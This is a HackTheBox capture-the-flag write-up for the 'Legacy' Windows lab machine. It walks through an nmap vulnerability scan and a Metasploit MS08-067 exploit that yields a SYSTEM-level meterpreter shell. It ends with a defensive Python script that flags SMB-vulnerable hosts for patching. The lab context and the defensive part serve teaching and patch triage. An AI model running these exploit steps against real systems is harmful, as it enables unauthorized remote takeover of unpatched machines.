HackTheBox – Legacy Writeup
Today we are going to solve Legacy from hackthebox.eu. Legacy is an easy Windows machine residing at the IP address 10.10.10.4, released on 15 July 2017. We use the MS08-067 exploit to attack this machine and gain system access. This machine is also vulnerable to the MS17-010 EternalBlue exploit.
Connecting to HTB VPN:
1. First download the VPN file from the access page of hackthebox.eu
2. Open the .ovpn file in your terminal with the following command:
openvpn yourname.ovpn
3. Once the “Initialization Completed” message appears on the screen, you are connected to the hackthebox network
4. You can access the machine at 10.10.10.4
Attack:
1. First let’s scan our target machine using the network scanner nmap with the following flags
nmap -sV -A -p- --script vuln 10.10.10.4
-sV : to identify the service versions on the different ports
-A : to get additional information about the system such as OS, build and traceroute
-p- : to scan all 65535 ports
--script vuln : to run the vuln scripts and see if the machine is vulnerable to any known exploits
2. We get the following results, showing that ports 139 and 445 are open.
The nmap results also show us that this machine is vulnerable to exploits such as MS08-067 and MS17-010
3. Let’s do a quick search on these exploits using Google and searchsploit
searchsploit ms08-067
4. From the searchsploit results we can see that there is a Metasploit module for MS08-067, so let’s fire up Metasploit
msfconsole
5. Now let’s search for the exploit in the Metasploit database with the following command
search ms08-067
6. We can see that there is a single exploit, and it is a remote code execution exploit, so let’s choose this one
use exploit/windows/smb/ms08_067_netapi
7. After choosing the exploit we have to set the remote port and the remote host that we are going to attack
set RHOST 10.10.10.4
set RPORT 445
8. You can check whether all the options are properly set
show options
9. Now let’s run our exploit with the following command
exploit
10. Now we have a meterpreter shell on the system. Sometimes it may take one to three tries for the exploit to work
11. You can check who you are on the system with the meterpreter command
getuid
So now we are NT AUTHORITY\SYSTEM, that is, we have full administrative access to the machine
12. After enumerating the system further you can see that the user flag is located on the desktop of the user john and the root flag is located on the desktop of the administrator
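From the defender's side, the nmap findings in step 2 are what a patch-triage job should catch before an attacker does. The following is an added example, not part of the original writeup: it reads nmap XML output (as saved with -oX) and lists hosts whose smb-vuln-ms08-067 or smb-vuln-ms17-010 script reported a vulnerable state. The sample XML is constructed and simplified, and the function name triage is hypothetical.

```python
import re
import xml.etree.ElementTree as ET

# Constructed, simplified `nmap -oX` output for illustration (not the scan from the writeup).
SAMPLE_XML = """<nmaprun>
 <host><address addr="10.10.10.4" addrtype="ipv4"/>
  <ports>
   <port protocol="tcp" portid="139"><state state="open"/></port>
   <port protocol="tcp" portid="445"><state state="open"/></port>
  </ports>
  <hostscript>
   <script id="smb-vuln-ms08-067" output="VULNERABLE:&#10;  State: VULNERABLE"/>
   <script id="smb-vuln-ms17-010" output="">
    <table key="constructed"><elem key="state">VULNERABLE</elem></table>
   </script>
  </hostscript>
 </host>
 <host><address addr="192.0.2.10" addrtype="ipv4"/>
  <ports><port protocol="tcp" portid="445"><state state="open"/></port></ports>
  <hostscript>
   <script id="smb-vuln-ms17-010" output="State: NOT VULNERABLE"/>
  </hostscript>
 </host>
</nmaprun>"""

SMB_PORTS = {"139", "445"}
# Matches "State: VULNERABLE" / "State: LIKELY VULNERABLE", but not "State: NOT VULNERABLE".
STATE_RE = re.compile(r"State:\s*(LIKELY )?VULNERABLE\b")

def triage(xml_text):
    """Return {ip: {"smb_ports": [...], "vulnerable": [script ids]}} for hosts to patch."""
    findings = {}
    for host in ET.fromstring(xml_text).iter("host"):
        ip = host.find("address").get("addr")
        open_smb = sorted(p.get("portid") for p in host.iter("port")
                          if p.get("portid") in SMB_PORTS
                          and p.find("state").get("state") == "open")
        vulnerable = []
        for script in host.iter("script"):
            # Prefer the structured "state" element; fall back to the text output.
            states = [e.text or "" for e in script.iter("elem") if e.get("key") == "state"]
            if (any(s.startswith(("VULNERABLE", "LIKELY VULNERABLE")) for s in states)
                    or STATE_RE.search(script.get("output", ""))):
                vulnerable.append(script.get("id"))
        if vulnerable:
            findings[ip] = {"smb_ports": open_smb, "vulnerable": sorted(vulnerable)}
    return findings

if __name__ == "__main__":
    for ip, info in triage(SAMPLE_XML).items():
        print(ip, "open SMB ports:", info["smb_ports"], "patch for:", info["vulnerable"])
```

Hosts returned by triage should have the corresponding Microsoft security updates applied and ports 139 and 445 filtered from untrusted networks.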